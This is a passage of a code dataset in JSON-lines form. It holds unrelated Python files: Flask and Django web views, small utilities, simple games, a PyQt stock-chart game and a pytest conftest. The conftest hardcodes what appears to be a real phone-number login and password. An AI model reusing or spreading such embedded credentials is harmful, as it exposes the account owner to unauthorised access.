\").format(title=cred.title),\n success=_(u\"You have deleted access key ‘{title}’\").format(title=cred.title),\n next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: user permissions ------------------------------------------------\n\n@lastuser_ui.route('/perms')\n@requires_login\ndef permission_list():\n allperms = Permission.query.filter_by(allusers=True).order_by(Permission.name).all()\n userperms = Permission.query.filter(\n db.or_(Permission.user_id == current_auth.user.id,\n Permission.org_id.in_(current_auth.user.organizations_owned_ids()))\n ).order_by(Permission.name).all()\n return render_template('permission_list.html.jinja2', allperms=allperms, userperms=userperms)\n\n\n@lastuser_ui.route('/perms/new', methods=['GET', 'POST'])\n@requires_login\ndef permission_new():\n form = PermissionForm()\n form.edit_user = current_auth.user\n form.context.choices = available_client_owners()\n if request.method == 'GET':\n form.context.data = current_auth.user.buid\n if form.validate_on_submit():\n perm = Permission()\n form.populate_obj(perm)\n perm.user = form.user\n perm.org = form.org\n perm.allusers = False\n db.session.add(perm)\n db.session.commit()\n flash(_(\"Your new permission has been defined\"), 'success')\n return render_redirect(url_for('.permission_list'), code=303)\n return render_form(form=form, title=_(\"Define a new permission\"), formid='perm_new',\n submit=_(\"Define new permission\"), ajax=True)\n\n\n@lastuser_ui.route('/perms//edit', methods=['GET', 'POST'])\n@requires_login\n@load_model(Permission, {'id': 'id'}, 'perm', permission='edit')\ndef permission_edit(perm):\n form = PermissionForm(obj=perm)\n form.edit_user = current_auth.user\n form.context.choices = available_client_owners()\n if request.method == 'GET':\n if perm.user:\n form.context.data = perm.user.buid\n else:\n form.context.data = perm.org.buid\n if form.validate_on_submit():\n form.populate_obj(perm)\n perm.user = form.user\n perm.org = form.org\n db.session.commit()\n flash(_(\"Your permission has been saved\"), 'success')\n return render_redirect(url_for('.permission_list'), code=303)\n return render_form(form=form, title=_(\"Edit permission\"), formid='perm_edit',\n submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/perms//delete', methods=['GET', 'POST'])\n@requires_login\n@load_model(Permission, {'id': 'id'}, 'perm', permission='delete')\ndef permission_delete(perm):\n return render_delete_sqla(perm, db, title=_(u\"Confirm delete\"), message=_(u\"Delete permission ‘{name}’?\").format(name=perm.name),\n success=_(\"Your permission has been deleted\"),\n next=url_for('.permission_list'))\n\n\n# --- Routes: client app permissions ------------------------------------------\n\n\n@lastuser_ui.route('/apps//perms/new', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='assign-permissions')\ndef permission_user_new(client):\n if client.user:\n available_perms = Permission.query.filter(db.or_(\n Permission.allusers == True,\n Permission.user == current_auth.user)).order_by(Permission.name).all() # NOQA\n form = UserPermissionAssignForm()\n elif client.org:\n available_perms = Permission.query.filter(db.or_(\n Permission.allusers == True,\n Permission.org == client.org)).order_by(Permssion.name).all() # NOQA\n form = TeamPermissionAssignForm()\n form.org = client.org\n form.team_id.choices = [(team.buid, team.title) for team in client.org.teams]\n else:\n abort(403) # This should never happen. 
Clients always have an owner.\n    form.perms.choices = [(ap.name, _(u\"{name} – {title}\").format(name=ap.name, title=ap.title)) for ap in available_perms]\n    if form.validate_on_submit():\n        perms = set()\n        if client.user:\n            permassign = UserClientPermissions.query.filter_by(user=form.user.data, client=client).first()\n            if permassign:\n                perms.update(permassign.access_permissions.split(u' '))\n            else:\n                permassign = UserClientPermissions(user=form.user.data, client=client)\n                db.session.add(permassign)\n        else:\n            permassign = TeamClientPermissions.query.filter_by(team=form.team, client=client).first()\n            if permassign:\n                perms.update(permassign.access_permissions.split(u' '))\n            else:\n                permassign = TeamClientPermissions(team=form.team, client=client)\n                db.session.add(permassign)\n        perms.update(form.perms.data)\n        permassign.access_permissions = u' '.join(sorted(perms))\n        db.session.commit()\n        if client.user:\n            flash(_(u\"Permissions have been assigned to user {pname}\").format(pname=form.user.data.pickername), 'success')\n        else:\n            flash(_(u\"Permissions have been assigned to team ‘{pname}’\").format(pname=permassign.team.pickername), 'success')\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n    return render_form(form=form, title=_(\"Assign permissions\"), formid='perm_assign',\n        submit=_(\"Assign permissions\"))\n\n\n@lastuser_ui.route('/apps/<key>/perms/<buid>/edit', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='assign-permissions', kwargs=True)\ndef permission_user_edit(client, kwargs):\n    if client.user:\n        user = User.get(buid=kwargs['buid'])\n        if not user:\n            abort(404)\n        available_perms = Permission.query.filter(db.or_(\n            Permission.allusers == True,\n            Permission.user == current_auth.user)).order_by(Permission.name).all() # NOQA\n        permassign = UserClientPermissions.query.filter_by(user=user, client=client).first_or_404()\n    elif client.org:\n        team = Team.get(buid=kwargs['buid'])\n        if not team:\n            abort(404)\n        available_perms = Permission.query.filter(db.or_(\n            Permission.allusers == True,\n            Permission.org == client.org)).order_by(Permission.name).all() # NOQA\n        permassign = TeamClientPermissions.query.filter_by(team=team, client=client).first_or_404()\n    form = PermissionEditForm()\n    form.perms.choices = [(ap.name, _(u\"{name} – {title}\").format(name=ap.name, title=ap.title)) for ap in available_perms]\n    if request.method == 'GET':\n        if permassign:\n            form.perms.data = permassign.access_permissions.split(u' ')\n    if form.validate_on_submit():\n        form.perms.data.sort()\n        perms = u' '.join(form.perms.data)\n        if not perms:\n            db.session.delete(permassign)\n        else:\n            permassign.access_permissions = perms\n        db.session.commit()\n        if perms:\n            if client.user:\n                flash(_(u\"Permissions have been updated for user {pname}\").format(pname=user.pickername), 'success')\n            else:\n                flash(_(u\"Permissions have been updated for team {title}\").format(title=team.title), 'success')\n        else:\n            if client.user:\n                flash(_(u\"All permissions have been revoked for user {pname}\").format(pname=user.pickername), 'success')\n            else:\n                flash(_(u\"All permissions have been revoked for team {title}\").format(title=team.title), 'success')\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n    return render_form(form=form, title=_(\"Edit permissions\"), formid='perm_edit', submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/<key>/perms/<buid>/delete', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', 
permission='assign-permissions', kwargs=True)\ndef permission_user_delete(client, kwargs):\n    if client.user:\n        user = User.get(buid=kwargs['buid'])\n        if not user:\n            abort(404)\n        permassign = UserClientPermissions.query.filter_by(user=user, client=client).first_or_404()\n        return render_delete_sqla(permassign, db, title=_(u\"Confirm delete\"),\n            message=_(u\"Remove all permissions assigned to user {pname} for app ‘{title}’?\").format(\n                pname=user.pickername, title=client.title),\n            success=_(u\"You have revoked permissions for user {pname}\").format(pname=user.pickername),\n            next=url_for('.client_info', key=client.key))\n    else:\n        team = Team.get(buid=kwargs['buid'])\n        if not team:\n            abort(404)\n        permassign = TeamClientPermissions.query.filter_by(team=team, client=client).first_or_404()\n        return render_delete_sqla(permassign, db, title=_(u\"Confirm delete\"),\n            message=_(u\"Remove all permissions assigned to team ‘{pname}’ for app ‘{title}’?\").format(\n                pname=team.title, title=client.title),\n            success=_(u\"You have revoked permissions for team {title}\").format(title=team.title),\n            next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: client app resources --------------------------------------------\n\n@lastuser_ui.route('/apps/<key>/resources/new', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client', permission='new-resource')\ndef resource_new(client):\n    form = ResourceForm()\n    form.client = client\n    form.edit_id = None\n    if form.validate_on_submit():\n        resource = Resource(client=client)\n        form.populate_obj(resource)\n        db.session.add(resource)\n        db.session.commit()\n        flash(_(\"Your new resource has been saved\"), 'success')\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n    return render_form(form=form, title=_(\"Define a resource\"), formid='resource_new',\n        submit=_(\"Define resource\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/<key>/resources/<idr>/edit', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n    (Client, {'key': 'key'}, 'client'),\n    (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n    permission='edit')\ndef resource_edit(client, resource):\n    form = ResourceForm(obj=resource)\n    form.client = client\n    if form.validate_on_submit():\n        form.populate_obj(resource)\n        db.session.commit()\n        flash(_(\"Your resource has been edited\"), 'success')\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n    return render_form(form=form, title=_(\"Edit resource\"), formid='resource_edit',\n        submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/<key>/resources/<idr>/delete', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n    (Client, {'key': 'key'}, 'client'),\n    (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n    permission='delete')\ndef resource_delete(client, resource):\n    return render_delete_sqla(resource, db, title=_(u\"Confirm delete\"),\n        message=_(u\"Delete resource ‘{resource}’ from app ‘{client}’?\").format(\n            resource=resource.title, client=client.title),\n        success=_(u\"You have deleted resource ‘{resource}’ on app ‘{client}’\").format(\n            resource=resource.title, client=client.title),\n        next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: resource actions ------------------------------------------------\n\n@lastuser_ui.route('/apps/<key>/resources/<idr>/actions/new', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n    (Client, {'key': 'key'}, 'client'),\n    (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n    permission='new-action')\ndef 
resource_action_new(client, resource):\n    form = ResourceActionForm()\n    form.edit_id = None\n    form.edit_resource = resource\n    if form.validate_on_submit():\n        action = ResourceAction(resource=resource)\n        form.populate_obj(action)\n        db.session.add(action)\n        db.session.commit()\n        flash(_(\"Your new action has been saved\"), 'success')\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n    return render_form(form=form, title=_(\"Define an action\"), formid='action_new',\n        submit=_(\"Define action\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/<key>/resources/<idr>/actions/<ida>/edit', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n    (Client, {'key': 'key'}, 'client'),\n    (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n    (ResourceAction, {'id': 'ida', 'resource': 'resource'}, 'action'),\n    permission='edit')\ndef resource_action_edit(client, resource, action):\n    form = ResourceActionForm(obj=action)\n    form.edit_resource = resource\n    if form.validate_on_submit():\n        form.populate_obj(action)\n        db.session.commit()\n        flash(_(\"Your action has been edited\"), 'success')\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n    return render_form(form=form, title=_(\"Edit action\"), formid='action_edit',\n        submit=_(\"Save changes\"), ajax=True)\n\n\n@lastuser_ui.route('/apps/<key>/resources/<idr>/actions/<ida>/delete', methods=['GET', 'POST'])\n@requires_login\n@load_models(\n    (Client, {'key': 'key'}, 'client'),\n    (Resource, {'id': 'idr', 'client': 'client'}, 'resource'),\n    (ResourceAction, {'id': 'ida', 'resource': 'resource'}, 'action'),\n    permission='delete')\ndef resource_action_delete(client, resource, action):\n    return render_delete_sqla(action, db, title=_(\"Confirm delete\"),\n        message=_(u\"Delete action ‘{action}’ from resource ‘{resource}’ of app ‘{client}’?\").format(\n            action=action.title, resource=resource.title, client=client.title),\n        success=_(u\"You have deleted action ‘{action}’ on resource ‘{resource}’ of app ‘{client}’\").format(\n            action=action.title, resource=resource.title, client=client.title),\n        next=url_for('.client_info', key=client.key))\n\n\n# --- Routes: client team access ----------------------------------------------\n\n@lastuser_ui.route('/apps/<key>/teams', methods=['GET', 'POST'])\n@requires_login\n@load_model(Client, {'key': 'key'}, 'client')\ndef client_team_access(client):\n    form = ClientTeamAccessForm()\n    user_orgs = current_auth.user.organizations_owned()\n    form.organizations.choices = [(org.buid, org.title) for org in user_orgs]\n    org_selected = [org.buid for org in user_orgs if client in org.clients_with_team_access()]\n    if request.method == 'GET':\n        form.organizations.data = org_selected\n    if form.validate_on_submit():\n        org_del = Organization.query.filter(Organization.buid.in_(\n            set(org_selected) - set(form.organizations.data))).all()\n        org_add = Organization.query.filter(Organization.buid.in_(\n            set(form.organizations.data) - set(org_selected))).all()\n        cta_del = ClientTeamAccess.query.filter_by(client=client).filter(\n            ClientTeamAccess.org_id.in_([org.id for org in org_del])).all()\n        for cta in cta_del:\n            db.session.delete(cta)\n        for org in org_add:\n            cta = ClientTeamAccess(org=org, client=client, access_level=CLIENT_TEAM_ACCESS.ALL)\n            db.session.add(cta)\n        db.session.commit()\n        flash(_(\"You have assigned access to teams in your organizations for this app\"), 'success')\n        return render_redirect(url_for('.client_info', key=client.key), code=303)\n    return render_form(form=form, title=_(\"Select organizations\"), 
submit=_(\"Save\"), ajax=True)\n","sub_path":"lastuser_ui/views/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":22200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"513124623","text":"from ..data import MULTIPLE_CAMPUS\n\n\ndef append_institution_city(affil: str, location: str):\n \"\"\"\n Append city to university that has multiple campuses if exist\n \"\"\"\n for university in MULTIPLE_CAMPUS:\n if university in affil.lower():\n for city in MULTIPLE_CAMPUS[university]:\n if city in location.lower() and not city in affil.lower():\n affil = affil + \", \" + city\n return affil\n return affil\n","sub_path":"affiliation_parser/parser/append_institution_city.py","file_name":"append_institution_city.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634340854","text":"# coding: utf-8\nimport codecs\nimport json\n\n__author__ = \"Adrien Guille\"\n__email__ = \"adrien.guille@univ-lyon2.fr\"\n\n\ndef save_word_distribution(distribution, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('word\\tweight\\n')\n for weighted_word in distribution:\n f.write(weighted_word[0]+'\\t'+str(weighted_word[1])+'\\n')\n\n\ndef save_topic_distribution(distribution, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('topic\\tweight\\n')\n for i in range(len(distribution)):\n f.write('topic '+str(i)+'\\t'+str(distribution[i])+'\\n')\n\n\ndef save_topic_evolution(evolution, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('date\\tfrequency\\n')\n for date, frequency in evolution:\n f.write(str(date)+'\\t'+str(frequency)+'\\n')\n\n\ndef save_affiliation_repartition(affiliation_repartition, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as f:\n f.write('affiliation\\tcount\\n')\n for affiliation, count in affiliation_repartition.items():\n f.write(affiliation+'\\t'+str(count)+'\\n')\n\n\ndef save_topic_cloud(topic_model, file_path):\n json_graph = {}\n json_nodes = []\n json_links = []\n for i in range(topic_model.nb_topics):\n description = []\n for weighted_word in topic_model.top_words(i, 5):\n description.append(weighted_word[0])\n json_nodes.append({'name': i,\n 'frequency': topic_model.topic_frequency(i),\n 'description': ', '.join(description),\n 'group': i})\n json_graph['nodes'] = json_nodes\n json_graph['links'] = json_links\n with codecs.open(file_path, 'w', encoding='utf-8') as fp:\n json.dump(json_graph, fp, indent=4, separators=(',', ': '))\n\n\ndef save_json_object(json_object, file_path):\n with codecs.open(file_path, 'w', encoding='utf-8') as fp:\n json.dump(json_object, fp, indent=4, separators=(',', ': '))\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296376909","text":"from django.test import TestCase\n\n# Create your tests here.\nimport requests\ndata = {\n \"ToUserName\": \"uuu\",\n \"FromUserName\": \"xxx\",\n \"CreateTime\": \"1348831860\",\n \"MsgType\": \"text\",\n \"Content\": \"hhh\",\n \"MsgId\": \"1234567\",\n}\nurl = 'http://45.77.125.45/remind/get/'\nres = requests.post(url, 
data=data)\nprint(res.text)\n","sub_path":"remind/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"569502615","text":"from flask import Flask, flash, redirect, render_template, request, session, abort\nimport os\nimport json\nimport urllib2\n \ntmpl_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')\napp = Flask(__name__, template_folder=tmpl_dir)\n \ndef getExchangeRates():\n rates = []\n response = urllib2.urlopen('http://api.fixer.io/latest')\n data = response.read()\n rdata = json.loads(data, parse_float=float)\n \n rates.append( rdata['rates']['USD'] )\n rates.append( rdata['rates']['GBP'] )\n rates.append( rdata['rates']['HKD'] )\n rates.append( rdata['rates']['AUD'] )\n return rates\n \n@app.route(\"/\")\ndef index():\n rates = getExchangeRates()\n return render_template('test.html',**locals()) \n \n@app.route(\"/hello\")\ndef hello():\n return \"Hello World!\"\n \n \nif __name__ == \"__main__\":\n app.run()\n","sub_path":"Documents/5-FlaskCharts/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"618827119","text":"# (C) Copyright 2008 Association Paris-Montagne\n# Author: Georges Racinet \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as published\n# by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA\n# 02111-1307, USA.\n#\n# $Id: __init__.py 890 2008-06-18 18:26:32Z joe $\n\nfrom Products.CMFCore.permissions import setDefaultRoles\n\nViewCollectorData = 'View collector data'\nsetDefaultRoles(ViewCollectorData, ('Manager', 'Owner'))\n\nManageCollectorData = 'Manage collector data'\nsetDefaultRoles(ManageCollectorData, ('Manager', 'Owner'))\n","sub_path":"permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465169089","text":"import matplotlib.pyplot as plt\r\n\r\nX = range(1, 50)\r\n\r\nY = [value * 2 for value in X]\r\n\r\nprint(\"Values of X:\")\r\n\r\nprint(*range(1,50)) \r\n\r\nprint(\"Values of Y (twice of X):\")\r\n\r\nprint(Y)\r\n\r\n# Plot lines and/or markers to the Axes.\r\n\r\nplt.plot(X, Y)\r\n\r\n# Set the x axis label of the current axis.\r\n\r\nplt.xlabel('x - axis')\r\n\r\n# Set the y axis label of the current axis.\r\n\r\nplt.ylabel('y - axis')\r\n\r\n# Set a title \r\n\r\nplt.title('Plot of (X,Y).')\r\n\r\n# Display the figure.\r\n\r\nplt.show()","sub_path":"demo 1.py","file_name":"demo 1.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"56160145","text":"#A small word guessing game\n#By Hamish O'Keeffe\n#Change Log:\n#Version 0.2 (31-03-2016):\n#Added end function\n#Added wrongGuess system\n#Made the user unable to guess the same letter\n#Added some 
more feedback to the user\n#Version 0.1 (30-03-2016):\n#Initial Version\nwordList = [\"Aversa\",\"Anna\",\"Priam\",\"Nowi\",\"LonQu\",\"SayRi\",\"Gaius\",\"Yuugiri\"]\ndef select_word():\n import random\n word = wordList[random.randint(1,len(wordList))-1]\n return word \n\ndef setup(word):\n wordHidden = list('?' * len(word))\n #print(word)#Debug\n #print(wordHidden)#Debug\n return wordHidden\n\ndef user_guess(word,wordHidden):\n score = 0\n guessed = []\n wrongGuessNo = 0\n wordSplit = list(word.lower())\n #print(wordSplit)#Debug\n print(''.join(wordHidden))\n import re\n while \"?\" in wordHidden:\n guess = input(\"Please enter a letter\").lower()\n while len(guess) != 1 or not re.match(\"[a-z]\", guess):\n print(\"Error. Please enter a single letter.\")\n guess = input(\"Please enter a letter\").lower()\n if guess in guessed:\n print(\"You have already guessed {0}.\".format(guess))\n elif guess in wordSplit:\n pos = 0\n guessPos = [i for i, x in enumerate(wordSplit) if x == guess.lower()]\n #print(guessPos)#Debug\n for each in guessPos:\n wordHidden.pop(guessPos[pos])\n wordHidden.insert(guessPos[pos],guess)\n pos = pos + 1\n print(''.join(wordHidden))\n guessed.append(guess)\n else:\n print(\"Sorry. {0} is not in the word.\".format(guess))\n wrongGuessNo = wrongGuessNo + 1\n guessed.append(guess)\n print(''.join(wordHidden))\n if wrongGuessNo > 5:\n break\n print(\"Letters guessed:\")\n print(','.join(guessed))\n return wordHidden\n\ndef end(word,wordHidden):\n if ''.join(wordHidden) == word.lower():\n print(\"Congrats! You won.\")\n else:\n print(\"Sorry, you lost.\")\n\ndef main():\n repeat = True\n while repeat == True:\n word = select_word()\n wordHidden = setup(word)\n wordHidden = user_guess(word,wordHidden)\n end(word,wordHidden)\n playAgain = input(\"Play again? 
(Y/N)\")\n if playAgain.lower() in [\"n\",\"no\"]:\n break\n print(\"Goodbye\")\n exit()\n \n \n\nmain()\n \n","sub_path":"wordGuessGameV0.2.py","file_name":"wordGuessGameV0.2.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"366940507","text":"# Python 3.6.0\n# -*- coding: utf-8 -*-\n# 14.py\n\nimport sys\n\nlast = int(sys.argv[2])\n\nwith open(sys.argv[1]) as f:\n lines = f.readlines()\n\n# print the first `last` lines (like head -n); slicing avoids breaking early on duplicate lines\nfor line in lines[:last]:\n print(line, end=\"\")\n\n# command line\n\n# \n# $ head -3 hightemp.txt\n","sub_path":"Chapter02/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"50743010","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2021/2/23\n# @Author : chenlin\n# @Site :\n# @File : conftest.py\n# @Software: PyCharm\n\"\"\"\nconftest.py global fixtures, providing:\n1. a command-line parameter \"browser\" for switching between browsers\n2. the shared \"driver\" fixture used by the test cases\n\"\"\"\n\n\nimport time\nimport pytest\nfrom public.common import pyselenium\nfrom public.common import datainfo\nfrom public.appmodel import loginaction\nfrom config import globalparam\nfrom public.common import log\n\n# domain_data = datainfo.get_xls_to_dict(\"user.xlsx\", \"Sheet1\")[\"创建域管理员\"]\n# user_data = datainfo.get_xls_to_dict(\"user.xlsx\", \"authuser\")['创建运营部门用户']\nlog = log.Log()\n\n@pytest.fixture(scope=\"session\")\ndef driver(request):\n global driver\n '''Only opens the browser at session start and closes it at the end'''\n log.info(\"Opening the browser\")\n driver = pyselenium.PySelenium(globalparam.browser)\n driver.max_window() # maximize the window\n\n def end():\n log.info(\"All test cases finished, closing the browser\")\n time.sleep(globalparam.small)\n driver.quit()\n\n request.addfinalizer(end)\n return driver\n\n\n@pytest.fixture()\ndef login_admin(request, driver):\n \"\"\"Log in as a user\"\"\"\n log.info(\"Logging in\")\n login = loginaction.Login(driver)\n login.login('15928009283', 'www123456.')\n\n def end():\n log.info(\"Test case finished, logging out\")\n driver.origin_driver.delete_all_cookies()\n\n request.addfinalizer(end)\n return driver\n\n\n\n","sub_path":"testcase/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"259717428","text":"if __name__ == '__main__':\n import glob\n import os\n import re\n import shutil\n from collections import defaultdict, namedtuple\n\n class Result:\n def __init__(self):\n self.win = self.draw = self.lose = 0\n\n def __repr__(self):\n return f'{self.win}/{self.draw}/{self.lose}'\n\n d = defaultdict(lambda : defaultdict(lambda : defaultdict(lambda : Result())))\n\n ntest_lv_set = set()\n arz_gen_set = set()\n arz_sim_set = set()\n\n for fn in glob.glob('data/**/*', recursive=True):\n p = re.compile('.*reversi-NTest_(\\d*)-ARZ_(\\d*)_(\\d*)-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n ntest_lv = None\n if m:\n ntest_lv = int(m.group(1))\n arz_gen = int(m.group(2))\n arz_sim = int(m.group(3))\n arz_min = None\n ntest_score = int(m.group(4))\n arz_score = int(m.group(5))\n\n p = re.compile('.*reversi-NTest_(\\d*)-ARZ_(\\d*)_(\\d*)min-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n if ntest_lv is None and m:\n ntest_lv = int(m.group(1))\n arz_gen = int(m.group(2))\n arz_sim = None\n arz_min = int(m.group(3))\n ntest_score = int(m.group(4))\n arz_score = int(m.group(5))\n\n p = re.compile('.*reversi-ARZ_(\\d*)_(\\d*)-NTest_(\\d*)-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n if ntest_lv is None and m:\n 
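# ARZ-first filenames: the groups here are arz_gen, arz_sim, ntest_lv, arz_score, ntest_score (read off the pattern above)\n 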
arz_gen = int(m.group(1))\n arz_sim = int(m.group(2))\n arz_min = None\n ntest_lv = int(m.group(3))\n arz_score = int(m.group(4))\n ntest_score = int(m.group(5))\n\n p = re.compile('.*reversi-ARZ_(\\d*)_(\\d*)min-NTest_(\\d*)-(\\d*)_(\\d*).*ggf$')\n m = p.match(fn)\n if ntest_lv is None and m:\n arz_gen = int(m.group(1))\n arz_sim = None\n arz_min = int(m.group(2))\n ntest_lv = int(m.group(3))\n arz_score = int(m.group(4))\n ntest_score = int(m.group(5))\n\n if ntest_lv is None:\n continue\n\n if arz_score < ntest_score:\n continue\n\n dest_folder = os.path.join(os.path.dirname(fn), '../../../../reversi-alpha-zero-models/challenge-2/ggf', f'step-{arz_gen}')\n if arz_sim:\n dest_folder = os.path.join(dest_folder, f'sim-{arz_sim}')\n else:\n dest_folder = os.path.join(dest_folder, f'min-{arz_min}')\n dest_folder = os.path.join(dest_folder, f'ntest-{ntest_lv}')\n os.makedirs(dest_folder, exist_ok=True)\n dest = os.path.join(dest_folder, os.path.basename(fn))\n shutil.copy(fn, dest)\n","sub_path":"data/reversi/ggf/copygames.py","file_name":"copygames.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"444144963","text":"from django.urls import path\nfrom .views import (\n PostListView,\n PostDetailView,\n UserPostListView,\n)\n\nurlpatterns = [\n path('', PostListView.as_view(), name='blog-home'),\n path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),\n path('user/<str:username>', UserPostListView.as_view(), name='user-posts'),\n]\n","sub_path":"SPE-website/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"521030186","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nimport random\nimport numpy as np\nimport DB\n\n\n# main window\n# which inherits QDialog\nclass Window(QWidget):\n\n # constructor\n def __init__(self, parent=None):\n super(Window, self).__init__(parent)\n\n self.played=0\n self.skipped=0\n self.d_df={}#first is df master, second is the until random day\n\n self.ts_code=\"\"\n self.name=\"\"\n self.won=0\n self.port=100\n self.reveal_fgain20=0\n\n\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n\n\n self.toolbar = NavigationToolbar(self.canvas, self)\n\n #labels\n self.label= QLabel(f\"{self.played} traded\\n{self.won} traded won\\n{self.skipped} skipped\\nCash {self.port}\")\n self.label.setFont(QFont('Arial', 20))\n self.message= QLabel(f\"\")\n self.message.setFont(QFont('Arial', 30))\n\n # display buttons\n self.labelDisplay = QLabel(f\"Display:\")\n self.labelDisplay.setFont(QFont('Arial', 20))\n\n\n\n self.d240 = QPushButton('240 Days')\n self.d240.clicked.connect(self.draw240)\n self.d240.setFont(QFont('Arial', 20))\n\n self.d500 = QPushButton('500 Days')\n self.d500.clicked.connect(self.draw500)\n self.d500.setFont(QFont('Arial', 20))\n\n self.dall = QPushButton('All Time')\n self.dall.clicked.connect(self.drawalltime)\n self.dall.setFont(QFont('Arial', 20))\n\n #action buttons\n self.labelAction = QLabel(f\"Action:\")\n self.labelAction.setFont(QFont('Arial', 20))\n\n self.next = QPushButton('Next')\n self.next.clicked.connect(self.generate_chart)\n self.next.setFont(QFont('Arial', 20))\n\n 
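# action buttons: show the 20-day result, or bet it long/short; Long/Short stay disabled until generate_chart() loads a chart\n 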
self.resultbutton = QPushButton('Showresult')\n self.resultbutton.clicked.connect(self.showresult)\n self.resultbutton.setFont(QFont('Arial', 20))\n\n self.buy = QPushButton('Long 20 Days')\n self.buy.clicked.connect(self.long)\n self.buy.setFont(QFont('Arial', 20))\n\n self.sell = QPushButton('Short 20 Days')\n self.sell.clicked.connect(self.short)\n self.sell.setFont(QFont('Arial', 20))\n\n\n # creating a Vertical Box layout\n layout = QVBoxLayout()\n layout.addWidget(self.toolbar)\n layout.addWidget(self.canvas)\n\n hbox1 = QHBoxLayout()\n hbox1.addWidget(self.labelDisplay)\n hbox1.addWidget(self.d240)\n hbox1.addWidget(self.d500)\n hbox1.addWidget(self.dall)\n\n hbox2 = QHBoxLayout()\n hbox2.addWidget(self.labelAction)\n hbox2.addWidget(self.next)\n hbox2.addWidget(self.resultbutton)\n hbox2.addWidget(self.buy)\n hbox2.addWidget(self.sell)\n\n\n layout.addWidget(self.label)\n layout.addWidget(self.message)\n layout.addLayout(hbox1)\n layout.addLayout(hbox2)\n self.setLayout(layout)\n\n self.buy.setEnabled(False)\n self.sell.setEnabled(False)\n\n\n def draw500(self):\n # display last 20 days\n df = self.d_df[\"df\"]\n df = df.tail(500)\n self.draw_normal(df=df)\n\n def draw240(self):\n #display last 20 days\n 